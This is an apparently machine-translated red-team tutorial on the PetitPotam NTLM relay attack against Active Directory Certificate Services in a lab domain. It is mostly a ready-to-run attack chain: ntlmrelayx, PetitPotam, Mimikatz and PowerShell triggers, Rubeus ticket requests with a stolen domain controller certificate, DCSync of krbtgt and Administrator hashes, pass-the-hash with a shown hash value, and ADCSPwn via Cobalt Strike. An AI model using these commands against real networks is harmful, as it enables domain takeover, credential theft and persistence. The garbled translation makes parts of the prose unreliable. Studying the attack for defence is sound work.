Petitpotam – NTLM relay to ad CS

Deploy in an enterprise environment Active Directory Certificate Services (AD CS) It allows system administrators to use it to establish trust between different directory objects . however , It may allow red team operators to AD CS Of Web Interface operation NTLM Relay attack , To destroy the network .Web The interface is used to allow users to obtain certificates （Web register ）, adopt HTTP agreement , Signing and accepting... Is not supported NTLM Authentication .

Will Schroeder and Lee Christensen Details of the attack are described in the certified second-hand white paper . This attack forces the domain controller computer account (DC$) Configured to NTLM The relay host authenticates . Authentication is forwarded to the certification authority (CA) And make a certificate request . Once DC$ Account generation certificate , An attacker can use it to perform arbitrary operations on the domain controller , For example search Kerberos The hash value of the account to create the gold ticket and establish the domain persistence or dump the hash value of the domain administrator and establish the communication channel with the domain controller .

Active Directory Certificate services can be installed as a role on a domain controller or in a single server that is part of a domain . The following figure illustrates the attack steps ：

The attack requires the identity of the certification authority .“ certutil ” Binary is a command line tool , Can be used to dump and display certification authority information 、 Verification certificate, etc . therefore , It can be used as a quick way to discover whether a certification authority is deployed on the domain .

certutil.exe

The server name has been identified as “ ca.purple.lab ”, And you can use the following URL Upper HTTP visit Web Registration service ：

http://ca.purple.lab/certsrv/

Certification authority - Web The registration screen

In a system that is not joined to a domain , perform Impacket In Suite “ ntlmrelayx.py ” Various listeners will be configured （SMB、HTTP、WCF）, These listeners will capture authentication from the domain controller computer account and relay this authentication information to the active directory certification authority server .

python3 ntlmrelayx.py -t http://ca/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Forced validation can be performed by Lionel Gilles The name of the development is PetitPotam Proof of concept triggers . This is through the use of MS-EFSRPC Agreement to proceed API call (EfsRpcOpenFileRaw) To achieve , This call will trigger the computer account on the target to authenticate to another system . It can be configured by providing standard user credentials and using NTLM Relay system IP and CA Of IP Address to execute .

python3 PetitPotam.py -d purple.lab -u pentestlab -p Password1234 <Listener-IP> <DC-IP>

Even if no credentials are provided , It is also possible to perform this attack . If you deploy a certification authority on a domain controller instead of a different server without taking precautions , Even if you do not have credentials to access the network, the domain may be damaged .

python3 PetitPotam.py 10.0.0.2 10.0.0.1

If the following output is displayed , Indicates that the attack is successful and authentication has been triggered .

perhaps , If you have established initial access to the domain joined system , You can use binary files instead .

PetitPotam.exe 10.0.0.2 10.0.0.1

Like most attacks ,Benjamin Delpy Also in the newer version Mimikatz The authentication trigger is implemented in . Use an encrypted file system (EFS) modular , And specify the domain controller and act as NTLM The relay host will send the remote procedure call .

misc::efs /server:dc.purple.lab /connect:10.0.0.2

One more PetitPotam The attack PowerShell Realization , It is from S3cur3Th1sSh1t stay Mimikatz Developed after the module .

Import-Module .\Invoke-Petitpotam.ps1
Invoke-Petitpotam -Target 10.0.0.1 -CaptureHost 10.0.0.2

All of the above triggers will force DC$ account （ The machine account on the domain controller ） Authenticate to the certification authority .

Due to the attack, you need to install Web Service component or Web register , Therefore, it will be proposed to DC$ Request for certificate under account . Will be with Base64 Format generate certificate for account .

The certificate obtained can be used with Rubeus Use it together , To request... For a machine account that is a highly privileged account on a domain controller Kerberos Ticket （Ticket Granting Ticket）.

Rubeus.exe asktgt /user:DC$ /certificate:<base64-certificate> /ptt

The ticket will be imported into the user's current session . Because this ticket belongs to DC$ account , Therefore, it can be used to perform a series of activities to destroy the domain , For example search “ krbtgt ” Of the account NTLM Hash the value and create a gold ticket , Connect to a domain controller by WMI, Execute pass hashes, etc .

Running the following command will verify that the ticket is cached in the current login session .

klist

Because the ticket is cached ,DCSync Technology can be used to retrieve “ krbtgt ” The hash value of the account , To create gold notes and establish domain persistence .

mimikatz # lsadump::dcsync /user:krbtgt

Similarly , Users can be retrieved “ Administrators ” Password hash for . The user is “ Domain administrator ” A member of the group .

lsadump::dcsync /domain:purple.lab /user:Administrator

The hash value can be matched with the hash value from Impacket Of “ wmiexec ” Use it together , To establish a session with the domain controller as a domain administrator .

python3 wmiexec.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71 [email protected]

perhaps , have access to Mimikatz Or any other similar tool to perform hash passing techniques . stay Mimikatz To create another session as a user “ Administrators ”.

sekurlsa::pth /user:Administrator /domain:purple.lab /ntlm:58a478135a93ac3bf058a5ea0e8fdb71

You can map drives from new sessions C$ To access the domain controller file system .

net use z: \\dc\c$
dir z:

Mapping domain controller drivers

ADCSPwn

An alternative tool for implementing attacks ( ADCSPwn ) By batsec use C# Developed , Can pass “ execute-assembly ” stay Cobalt Strike Use in , Or any other similar red team framework （ Such as Covenant） Use it together . The obvious benefit is that attacks can be performed directly from memory , There is no need to delete anything to disk or use another system as a relay to pass authentication to CA.ADCSPwn Set up the relay server locally and call API (EfsRpcOpenFileRaw) Force Authentication .

adcspwn.exe --adcs ca.purple.lab --remote dc.purple.lab

ADCSPwn

The certificate will be in Base64 The format is generated into the console .

however , It should be noted that , This attack only occurs in “ WebClient ” The service is only valid when it is running on a domain controller . This service is not installed by default , Therefore, direct execution of the tool is unlikely to produce the desired results .

“WebClient” The service is installed on the server “ WebDav Redirector ” Function .